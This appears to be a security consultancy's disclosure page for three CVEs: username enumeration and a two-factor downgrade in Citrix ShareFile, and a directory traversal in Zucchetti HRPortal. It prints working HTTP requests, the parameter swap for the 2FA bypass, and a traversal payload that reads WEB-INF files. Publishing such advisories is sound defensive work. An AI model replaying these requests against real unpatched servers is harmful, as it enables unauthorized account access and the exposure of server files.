Research and Development

Our CVEs


CVE 2019-7217 : Citrix ShareFile User Enumeration

Summary
It is possible to enumerate application username based on different server responses using the request to check the otp code.
No authentication is required.
Tested Versions
Citrix ShareFile through 19.1
Fixed Versions
Citrix ShareFile from version 19.12
Product URLs
https://www.sharefile.com/
Details
It is possible to enumerate application username based on different server responses using the request to check the otp code.
No authentication is required.

Example:
It is possible to enumerate application username based on different server 
responses using the request to check the otp code without user authentication:

Request:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close
tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&
response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&
state=FxwxORudhXUqUh3phnC6Mg%3D%3D&
redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&
h=&requireV3=false&code=123

Response if username is not correct:
{"error":true,"errorMessage":"You are not authorized to 
use this client","errorCode":126}

Response if username is correct:
{"error":true,"errorMessage":"Unable to verify two factor 
code.","errorCode":122}


Timeline
22-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release
CREDIT
Discovered by Armando Huesca and Andrea Pessione of SKIT (Shorr Kan IT Engineering srl)


CVE 2019-7218 : Citrix ShareFile TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR

Summary
An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).
Tested Versions
Citrix ShareFile through 19.1
Fixed Versions
Citrix ShareFile from version 19.23
Product URLs
https://www.sharefile.com/
Details
An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).
This way, it is possible to downgrade 2FA to 1FA, without knowing the victim’s password.
In order to exploit this vulnerability, attackers should have access to the offline otp token (physical or virtual): it is not possible to gain access if the otp is generated after the phase 1 authentication and sent to the client via SMS or phone call.
This vulnerability takes place because the server does not control that client’s phase 1 authentication succeeded before validating phase 2 authentication (authentication schema).

Example:
An attacker is able to intercept the log-in request with garbage data and use 
this request as base for the attack, changing the op and password parameters as
follows:

Figure 1 - phase 1 default log-in request and response
image1

- change op=webflow-auth with op=webflow-verify

- change password=* with code=[OTP]

In case that the username/otp combination is correct (phase 2 succeeded), 
phase 1 authentication is bypassed and unauthorized access to the 
application is gained by the attacker as shown below:

Figure 2 - evil phase 2 request with modified parameters
image2

Follows the proof of unathorized access to the web application 
by exploiting this vulnerability.

Figure 3 - Unauthorized access to the application
image3

ADVICE:	Make sure that client’s phase 1 authentication 
succeeded before validating phase 2 authentication.


Timeline
28-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release
CREDIT
Discovered by Andrea Pessione and Armando Huesca of SKIT (Shorr Kan IT Engineering srl)


CVE 2019-10257 : Zucchetti HRPortal DIRECTORY TRAVERSAL on the application login page

Summary
Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system.
Tested Versions
>Zucchetti HRPortal (version until 2019-03-15)
Product URLs
https://www.zucchetti.it/website/cms/prodotto/2970-portale-risorse-umane.html
Details
DIRECTORY TRAVERSAL on Zucchetti HRPortal’s login page.
Using this vulnerability unauthenticated users can escape outside of the restricted location to access files or directories that are elsewhere on the system. Trough this vulnerability is possible read the java source of the appliacation from /WEB-INF/classes/*.class

Example:
../../../WEB-INF/classes/cp_login.class;

The following request permit to read web.xml file contentfrom the directory WEB-INF:

POST /hrportal/servlet/cp_login HTTP/1.1
Host: hrportal.XXXX.it
Accept-Encoding: gzip, deflate
Referer: https://hrportal.XXXX.it/hrportal/jsp/login.jsp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
 
m_cURLOnError=../../../WEB-INF/web.xml;

zimage1 zimage2




Timeline
15-03-2019 Vendor disclosure
28-03-2019 No acknoledge from vendor
02-04-2019 New vendor disclosure directly to company CSO xxxx.yyyy@zucchetti.it
28-04-2019 No acknowledge from vendor
15-06-2019 Public Release
CREDIT
Discovered by Andrea Pessione of SKIT (Shorr Kan IT Engineering srl)


New CVEs in the next episode ...